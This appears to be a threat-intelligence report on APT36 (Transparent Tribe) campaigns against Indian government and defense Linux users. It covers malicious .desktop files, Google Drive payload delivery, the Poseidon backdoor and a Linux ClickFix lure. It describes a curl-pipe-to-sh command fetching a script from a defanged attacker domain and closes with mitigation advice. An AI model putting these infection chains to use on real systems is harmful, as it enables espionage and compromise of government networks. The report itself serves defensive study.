The Pakistan-linked threat actor APT36 (also known as Transparent Tribe or Mythic Leopard) has significantly evolved its cyber-espionage operations against Indian targets. A recent campaign, detailed in an August 2025 report by CloudSEK1, reveals the group’s use of malicious Linux `.desktop` files to deploy malware. This technique is part of a broader, multi-year strategic shift by the group to target Linux environments, specifically the Indian-made BOSS Linux distribution prevalent in government and defense sectors. This expansion now includes the adaptation of the sophisticated “ClickFix” social engineering technique for Linux systems, a method previously observed primarily in Windows-based attacks23.
For security leadership, the core takeaway is APT36’s demonstrated persistence and innovation in cross-platform operations. The group is systematically moving beyond its historical focus on Windows and Android to exploit the perception of Linux as a more secure environment. Their tactics now include at least four distinct infection chains, abuse of legitimate services like Google Drive for payload delivery, and the use of advanced, open-source command and control (C2) frameworks. The testing of ClickFit against Linux suggests that a fully weaponized version of this attack vector is imminent, posing a direct threat to critical infrastructure and defense networks.
* **Threat Actor:** APT36 (Transparent Tribe, Mythic Leopard), a Pakistan-linked APT group.
* **Primary Targets:** Indian government, Ministry of Defence, defense contractors, and critical infrastructure (Railways, Oil & Gas).
* **Core Techniques:** Malicious `.desktop` files, weaponized ZIP archives, Google Drive payload delivery, and OS-aware ClickFix social engineering.
* **Key Malware:** Golang-based payloads and the “Poseidon” backdoor, built on the Mythic C2 framework.
* **New Development:** Successful adaptation of the ClickFix technique for Linux, currently in a testing and reconnaissance phase.
Technical Analysis of the .desktop File Campaign
The CloudSEK investigation outlines a campaign where APT36 delivers phishing emails containing a ZIP archive. This archive holds a malicious `.desktop` file crafted to appear as a harmless PDF document. In Linux environments, `.desktop` files are shortcut files that specify how an application should be launched. APT36 abuses the `Exec` parameter within this file to execute a malicious base64-encoded script. This script is designed to download a hex-encoded payload from a Google Drive URL while simultaneously opening a legitimate decoy PDF from the same service to deceive the user. The final payload is a statically linked Golang binary that establishes persistence on the compromised host and communicates with a WebSocket C2 server1.
This method is effective because it leverages a trusted platform (Google Drive) for hosting malicious components, increasing the likelihood of bypassing security filters. The use of a Golang binary complicates analysis for defenders, as these are often statically compiled and contain a large amount of code to sift through. The WebSocket protocol for C2 communication can also help blend malicious traffic with legitimate web traffic, making detection more challenging for traditional network monitoring tools. This campaign represents a mature evolution from earlier attacks observed by Uptycs in April 2023, which used a fake version of the “Kavach” authentication app as a lure4.
The Evolution to ClickFix Social Engineering on Linux
A critical development in APT36’s strategy is the adoption of the ClickFix social engineering technique, as documented by Hunt.io and BleepingComputer in May 202523. This method moves the initial attack vector from email attachments to malicious websites, significantly broadening the potential attack surface. In this campaign, APT36 created a website impersonating India’s Ministry of Defence. The site employed browser-based operating system fingerprinting to profile visitors and serve them a tailored attack flow. Windows users were presented with a fake copyright warning, while Linux users encountered a CAPTCHA page.
For Linux targets, clicking the “I’m not a robot” button copies a shell command to the user’s clipboard. The command uses `curl` to fetch a shell script (`mapeal.sh`) from the attacker-controlled domain `trade4wealth[.]in` and pipes it directly to `sh` for execution. The user is then instructed to open the Linux run dialog (often with ALT+F2), paste the command, and run it. In its analyzed form, the script was non-destructive, merely downloading a JPEG image. This indicates a testing and reconnaissance phase where the group validated the effectiveness of the social engineering lure and the execution chain without deploying a full malware payload.
Infrastructure and Malware Capabilities
APT36 maintains a robust and redundant infrastructure to support its campaigns. The group has been linked to over 100 phishing domains, often hosted on providers like AlexHost and using deceptive top-level domains such as `.report` and `.support` to appear legitimate78. The malware deployed, particularly the Poseidon backdoor, is highly capable. Based on the open-source Mythic C2 framework, it provides the threat actors with over 40 commands, including full shell access, file upload and download capabilities, keystroke logging, and the ability to capture screenshots from the infected machine4.
The consistent use of Golang for payloads across multiple campaigns highlights a deliberate choice to hinder analysis. The group’s ability to quickly adapt its social engineering lures—from fake security advisories6 to impersonation of the Ministry of Defence—demonstrates a keen understanding of their target demographics. The infrastructure used in the ClickFit campaign (`trade4wealth[.]in`) has been linked to previously known APT36 operations, strengthening the attribution for these new attacks.
Relevance and Remediation Steps
This activity is highly relevant to organizations within APT36’s targeting scope, particularly those in Indian government, defense, and critical infrastructure sectors. The shift to Linux and the use of advanced social engineering techniques necessitate a review of security postures beyond traditional Windows-centric models.
Mitigation strategies should include user awareness training focused on identifying novel social engineering tactics like ClickFit, where users are asked to execute commands copied from a website. Technical controls should encompass stringent web filtering to block access to known malicious domains, implementation of application allowlisting to prevent the execution of unauthorized scripts and binaries, and deployment of Linux-capable Endpoint Detection and Response (EDR) solutions to monitor for suspicious process activity and network connections. Network monitoring should be configured to alert on outbound connections to newly registered or suspicious domains, as well as the use of WebSocket protocols to unknown external hosts.
The testing phase of the Linux ClickFit attack suggests that a more destructive payload is likely to be deployed in the future. Organizations should proactively hunt for IOCs related to these campaigns and consider simulating these TTPs in red team exercises to test defensive capabilities. Monitoring for the execution of commands that pipe `curl` or `wget` output directly to an interpreter is a key detection opportunity.
Conclusion
APT36’s ongoing operations demonstrate a clear and calculated evolution in tactics, techniques, and procedures. The group has successfully expanded its capabilities to target Linux systems effectively, leveraging both conventional methods like malicious `.desktop` files and advanced techniques like OS-aware ClickFix social engineering. The group’s persistence, innovation, and focused targeting present a continued threat to its objectives. The current ClickFix testing against Linux systems serves as a warning that this technique will almost certainly be weaponized in upcoming campaigns. Defenders must extend robust security practices, advanced monitoring, and user training to cover their entire infrastructure, regardless of operating system.
References
- APT36 Malware Campaign Using Desktop Entry Files and Google Drive Payload Delivery. CloudSEK. Aug. 21, 2025.
- APT36 ClickFix Campaign: Indian Ministry of Defence. Hunt.io Research. May 2025.
- Hackers now testing ClickFix attacks against Linux targets. BleepingComputer. May 12, 2025.
- Cyber Espionage in India: Decoding APT-36’s New Linux Malware Campaign. Uptycs. Apr. 17, 2023.
- What is the APT36 BOSS Linux attack?. WebAsha Technologies. Jul. 7, 2025.
- Phishing Attack : Deploying Malware on Indian Defense BOSS Linux. CYFIRMA. Jul. 4, 2025.
- APT36 Hackers Exploit Malicious PDF Files to Attack Indian Railways, Oil, and Government Networks. Hunt.io / CyberPress. Aug. 1, 2025.
- APT36 Hackers Target Indian Railways, Oil, and Government Systems Using Malicious PDF Files. GBHackers. Aug. 1, 2025.
- Pakistan’s Transparent Tribe Hits Indian Defence with Linux Malware. Hackread. Jul. 8, 2025.
- Inside the ZIP Trap: How APT36 Targets BOSS Linux to Exfiltrate Critical Data. GBHackers. Jul. 7, 2025.
